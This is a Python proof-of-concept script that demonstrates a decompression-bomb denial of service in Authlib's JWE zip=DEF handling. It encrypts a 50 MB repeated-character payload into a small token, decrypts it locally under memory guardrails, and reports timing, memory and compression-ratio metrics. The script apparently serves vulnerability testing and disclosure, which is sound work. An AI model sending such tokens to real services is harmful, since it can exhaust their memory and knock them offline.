#!/usr/bin/env python3
"""Exercise Authlib JWE zip=DEF decompression behavior for benign vs bomb payloads.

Usage example:
    python3 jwe_deflate_dos_demo.py --size 50 --max-rss-mb 2048
"""
# Summary: Demonstrates Authlib's JWE decompression handling by comparing a tiny plaintext
# with a compressible megabyte-scale payload, reporting runtime, memory, and size metrics.
# Variables:
# PROTECTED_HEADER: dict - Static header enabling direct A256GCM with DEFLATE compression.
# SYMMETRIC_KEY: bytes - Fixed 32-byte local key for reproducible JWE encryption/decryption.
# DEFAULT_NORMAL_PLAINTEXT: bytes - Small sample payload used for the baseline case (~13B).
# CSV_HEADER: tuple[str, ...] - Column labels for optional CSV logging output.
# JWE_INSTANCE: JsonWebEncryption - Shared Authlib JWE helper reused across test cases.
#
# Added  to exercise Authlib's JWE zip=DEF path: encrypts/decrypts both a tiny baseline message
# and a compressible bomb payload, captures wall/CPU timing, peak RSS, current RSS deltas,
# ciphertext vs. decompressed sizes, and compression ratio; optional CSV logging and memory
# guardrails are built in so the decompression spike is easy to capture ()

import argparse  # Parse CLI arguments for payload sizing, RSS limit, and CSV logging.
import csv  # Emit optional structured metrics for later analysis via spreadsheets.
import os  # Provide access to process identifiers for RSS sampling fallbacks.
import platform  # Surface runtime context in warning banners for clarity.
import sys  # Handle graceful exits and MemoryError propagation paths.
import time  # Measure wall-clock and CPU durations for decrypt operations.
import resource  # Inspect peak RSS via POSIX resource usage metrics.

try:  # Attempt to expose resident set size via psutil when available.
    import psutil  # type: ignore  # Access richer memory telemetry when the library exists.
except ImportError:  # Fallback path when psutil is not installed in the environment.
    psutil = None  # Ensure the rest of the script can gracefully integrate without psutil.

from authlib import __version__ as AUTHLIB_VERSION  # Report the installed Authlib version.
from authlib.jose import JsonWebEncryption  # Perform compact JWE encode/decode operations.

PROTECTED_HEADER = {"alg": "dir", "enc": "A256GCM", "zip": "DEF"}  # Fixed header for dir+A256GCM with DEFLATE.
SYMMETRIC_KEY = b"\x01" * 32  # Static local key material for deterministic demos (not for production).
DEFAULT_NORMAL_PLAINTEXT = b"Hello, world!"  # Baseline plaintext showing a typical small message.
CSV_HEADER = (  # Ordered column names mirrored in optional CSV output files.
    "case",  # Case label such as "normal" or "malicious".
    "plaintext_bytes",  # Size of the original plaintext submitted for encryption.
    "ciphertext_bytes",  # Size of the generated compact JWE ciphertext string (in bytes).
    "decompressed_bytes",  # Size of the decrypted plaintext returned by Authlib.
    "ratio",  # Compression ratio computed as decompressed_bytes / ciphertext_bytes.
    "wall_s",  # Wall-clock seconds required for the decrypt path.
    "cpu_s",  # CPU seconds consumed during the decrypt path.
    "peak_rss_mb",  # Process peak resident set size in megabytes.
    "rss_delta_mb",  # Change in resident set size observed across the decrypt call.
)
JWE_INSTANCE = JsonWebEncryption()  # Reused Authlib helper to avoid repeated instantiation overhead.


def parse_args() -> argparse.Namespace:  # Build and execute the command-line parser.
    parser = argparse.ArgumentParser(  # Instantiate the parser with a detailed description.
        description=(
            "LOCAL TEST ONLY – demonstrates Authlib JWE zip=DEF decompression expansion; "
            "do not transmit artifacts externally."
        )
    )
    parser.add_argument(  # Register the --size/-size option for controlling malicious payload scale.
        "--size",
        "-size",
        type=float,
        default=50.0,
        help="Malicious plaintext size in megabytes (default: 50).",
    )
    parser.add_argument(  # Register the --max-rss-mb guardrail to bound memory consumption.
        "--max-rss-mb",
        type=float,
        default=1024.0,
        help="Abort when process peak RSS exceeds this many megabytes (default: 1024).",
    )
    parser.add_argument(  # Allow optional CSV logging for result archiving.
        "--csv",
        type=str,
        default=None,
        help="Optional path to append CSV metrics for each case.",
    )
    return parser.parse_args()  # Return the parsed namespace to the caller.


def get_current_rss_mb() -> float:  # Return the current resident set size in megabytes.
    if psutil is not None:  # Prefer psutil for cross-platform RSS reporting when available.
        return psutil.Process(os.getpid()).memory_info().rss / (1024 * 1024)
    try:  # Fallback to Linux /proc-based sampling when psutil is missing.
        with open("/proc/self/statm", "r", encoding="ascii") as statm_file:
            fields = statm_file.read().strip().split()  # Extract memory statistics fields from statm.
        resident_pages = int(fields[1]) if len(fields) > 1 else 0  # Pull the resident page count.
        page_size = os.sysconf("SC_PAGE_SIZE") if hasattr(os, "sysconf") else 4096  # Identify OS page size.
        return (resident_pages * page_size) / (1024 * 1024)  # Convert pages to megabytes.
    except (FileNotFoundError, PermissionError, IndexError, ValueError):  # Catch sampling failures.
        return 0.0  # Defer to peak RSS when instantaneous sampling is unsupported.


def format_bytes(num_bytes: int) -> str:  # Produce a compact human-readable size string.
    if num_bytes >= 1024 * 1024:  # Use megabyte units for large payloads.
        return f"{num_bytes / (1024 * 1024):.0f}MB"
    if num_bytes >= 1024:  # Use kilobyte units for mid-sized payloads.
        return f"{num_bytes / 1024:.0f}KB"
    return f"{num_bytes}B"  # Fall back to raw byte counts for tiny payloads.


def compute_ratio(numerator: int, denominator: int) -> float:  # Safely compute compression ratio.
    if denominator == 0:  # Guard against division-by-zero when ciphertext is empty.
        return float("inf")
    return numerator / denominator  # Return the ratio as a floating-point value.


def serialize_ciphertext(plaintext: bytes) -> str:  # Encrypt plaintext into a compact JWE string.
    token = JWE_INSTANCE.serialize_compact(PROTECTED_HEADER, plaintext, SYMMETRIC_KEY)  # Produce JWE output.
    return token.decode("ascii") if isinstance(token, bytes) else token  # Normalize to text for downstream usage.


def deserialize_plaintext(ciphertext: str) -> bytes:  # Decrypt the compact JWE string back to bytes.
    data = JWE_INSTANCE.deserialize_compact(ciphertext, SYMMETRIC_KEY)  # Apply Authlib JWE decoding.
    return data["payload"]  # Extract the recovered plaintext payload.


def run_case(case_name: str, plaintext: bytes, rss_limit_mb: float) -> dict[str, float | int | str]:
    """Execute encryption/decompression and capture metrics for a single payload."""
    baseline_rss = get_current_rss_mb()  # Snapshot RSS before the decrypt call for delta calculations.
    ciphertext = serialize_ciphertext(plaintext)  # Produce the compact ciphertext for this plaintext.
    start_wall = time.perf_counter()  # Record wall-clock start time.
    start_cpu = time.process_time()  # Record CPU start time for process-centric measurement.
    decrypted = deserialize_plaintext(ciphertext)  # Trigger decompression and decryption.
    wall_delta = time.perf_counter() - start_wall  # Capture wall-clock duration for the decrypt path.
    cpu_delta = time.process_time() - start_cpu  # Capture CPU duration consumed during decrypt.
    peak_rss_mb = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1024  # Convert peak RSS to MB.
    current_rss_mb = get_current_rss_mb()  # Sample current RSS after decryption completes.
    rss_delta_mb = max(0.0, current_rss_mb - baseline_rss)  # Compute RSS delta while avoiding negatives.
    plaintext_bytes = len(plaintext)  # Measure the size of the input payload in bytes.
    ciphertext_bytes = len(ciphertext.encode("utf-8"))  # Measure ciphertext length (ASCII-safe).
    decompressed_bytes = len(decrypted)  # Measure the size of the decrypted output.
    ratio = compute_ratio(decompressed_bytes, ciphertext_bytes)  # Derive compression ratio.
    if peak_rss_mb > rss_limit_mb:  # Abort when RSS exceeds the configured safety limit.
        print(
            f"[ABORT] peak RSS {peak_rss_mb:.1f}MB exceeded limit {rss_limit_mb:.1f}MB during {case_name} case",
            file=sys.stderr,
        )
        sys.exit(1)
    return {  # Bundle metrics in a dictionary for downstream reporting.
        "case": case_name,
        "plaintext_bytes": plaintext_bytes,
        "ciphertext_bytes": ciphertext_bytes,
        "decompressed_bytes": decompressed_bytes,
        "ratio": ratio,
        "wall_s": wall_delta,
        "cpu_s": cpu_delta,
        "peak_rss_mb": peak_rss_mb,
        "rss_delta_mb": rss_delta_mb,
    }


def emit_case_report(case_metrics: dict[str, float | int | str]) -> None:  # Print a formatted report line.
    report_line = (  # Compose the output string with the desired metrics.
        f"[CASE] {case_metrics['case']} "
        f"plaintext={format_bytes(int(case_metrics['plaintext_bytes']))} "
        f"ciphertext={format_bytes(int(case_metrics['ciphertext_bytes']))} "
        f"decompressed={format_bytes(int(case_metrics['decompressed_bytes']))} "
        f"wall_s={case_metrics['wall_s']:.3f} "
        f"cpu_s={case_metrics['cpu_s']:.3f} "
        f"peak_rss_mb={case_metrics['peak_rss_mb']:.1f} "
        f"rss_delta_mb={case_metrics['rss_delta_mb']:.1f} "
        f"ratio={case_metrics['ratio']:.1f}"
    )
    print(report_line)  # Emit the composed report for the active case.


def maybe_write_csv(csv_path: str | None, metrics: list[dict[str, float | int | str]]) -> None:  # Log to CSV if requested.
    if not csv_path:  # Skip logging when no output path is provided.
        return
    file_exists = os.path.exists(csv_path)  # Check whether the file already exists to conditionally add headers.
    with open(csv_path, "a", newline="", encoding="utf-8") as csv_file:  # Open the CSV file for appending.
        writer = csv.DictWriter(csv_file, fieldnames=CSV_HEADER)  # Prepare a writer with consistent columns.
        if not file_exists:  # Only write the header once per file.
            writer.writeheader()
        for row in metrics:  # Iterate through the collected case metrics.
            writer.writerow(row)


def main() -> None:  # Orchestrate argument parsing, case execution, and reporting.
    args = parse_args()  # Parse CLI arguments using the helper above.
    print("LOCAL TEST ONLY – do not send to third-party systems.")  # Reinforce local-only expectations.
    print(  # Surface runtime metadata for reproducibility.
        f"Runtime: Python {platform.python_version()} / Authlib {AUTHLIB_VERSION} / zip=DEF via A256GCM"
    )
    malicious_plaintext_size = int(args.size * 1024 * 1024)  # Convert megabytes to raw byte count.
    try:  # Guard the heavy allocations and decrypt path against MemoryError.
        normal_case = run_case("normal", DEFAULT_NORMAL_PLAINTEXT, args.max_rss_mb)  # Execute baseline case.
        malicious_payload = ("A" * malicious_plaintext_size).encode("ascii")  # Build compressible bomb payload.
        malicious_case = run_case("malicious", malicious_payload, args.max_rss_mb)  # Execute bomb case.
    except MemoryError:  # Handle exhaustion gracefully.
        print(
            "Caught MemoryError while preparing or decrypting payload – lower --size or raise limits.",
            file=sys.stderr,
        )
        sys.exit(2)
    case_results = [normal_case, malicious_case]  # Aggregate results for uniform reporting/logging.
    for case in case_results:  # Stream reports in the original execution order.
        emit_case_report(case)
    maybe_write_csv(args.csv, case_results)  # Persist metrics when CSV logging is enabled.


if __name__ == "__main__":  # Execute the main entry point when run as a script.
    main()
